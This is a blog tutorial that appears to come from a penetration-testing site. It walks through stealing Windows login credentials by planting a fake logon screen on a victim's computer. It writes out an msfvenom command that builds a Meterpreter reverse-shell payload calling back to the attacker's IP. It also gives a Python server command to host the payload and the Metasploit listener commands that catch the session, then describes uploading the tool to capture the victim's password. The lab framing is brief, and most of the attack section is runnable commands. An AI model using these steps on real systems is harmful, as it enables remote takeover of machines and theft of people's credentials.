How to grab windows credentials using FakeLogonScreen Tool

December 24, 2020
Browse All Blogs
Intro Image
In this article, we will see a tool named FakeLogonScreen. As the name suggest this tool pretty much creates the fake logon screen on victim computer. Victim might think he accidentally logged off but that’s not the case.
This was created by Arris Huijgen and you can get it here
To get the better understanding of the tool let’s see how it works practically.
Topics included are Configurations, Situation, creating payload, Listening, Getting Session and Interacting with it, Uploading FakeLogonScreen.exe, Obtaining Credentials.
NOTE: This is lab environment real world application can be different.
Let’s get started.

Configurations

Attacker Machine: Kali Linux IP: 192.168.91.128

Victim Machine: Windows 8.1 IP: 192.168.91.131

Situation

The attacker machine is connected to the same network as the victim machine. The attacker is trying to get credentials of the victim machine. The attacker already has information about the type of OS used on victim machine as well as the IP Address.

Creating the payload

For creating the payload, I have used msfvenom tool. I have given my kali machine ip as LHOST. As the victim machine is windows, I have created the payload as .exe file for easy execution. To host the created payload, I have used a python one liner to create HTTP Server. Use the following command to create the payload.
Command
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=4444 -f exe >> payload.exe

# python -m SimpleHTTPServer 80

Listening

As our payload is ready to use let’s start listening process. We need listener to get the session of victim machine. After required configurations I went straight to the victim machine and executed the payload.

Getting Session and Interacting with it.

Set the payload, lhost and lport according to the payload. After that run the payload on victim machine. You will notice that you got the meterpreter session.
Command
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 4444
run -j

Uploading FakeLoggonScreen.exe

Check active session to be sure and interact with session. After you start interacting with session upload the FakeLogonScreen.

Obtaining Credentials

Get the shell from windows machine. As soon as the you get the shell execute the .exe file from the attacking machine. As you can see from the image the logon screen seems to be legit.
Let’s add wrong password to check.
Here you can see that this working as keylogger, Let’s add the correct password.
You have successfully obtained the credentials from victim machine.

Users also read:

January 6, 2021
How to Invade CouchDB with Ubuntu

In this article, we will demonstrate how you can set up your vulnerable CouchDB for pen-testing in Ubuntu 20.4

December 24, 2020
How to grab windows credentials using FakeLogonScreen Tool

This tool pretty much creates the fake logon screen on victim computer. Victim might think he accidentally logged off but that’s not the case.

November 7, 2020
Apple updates 3 Zero-Day bugs for the latest iOS update

These vulnerabilities were found in the FontParser and Kernel of iOS. Allowing the attacker to remotely execute the arbitrary code with kernel-level benefits.

Leave a Reply

Your email address will not be published. Required fields are marked *

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram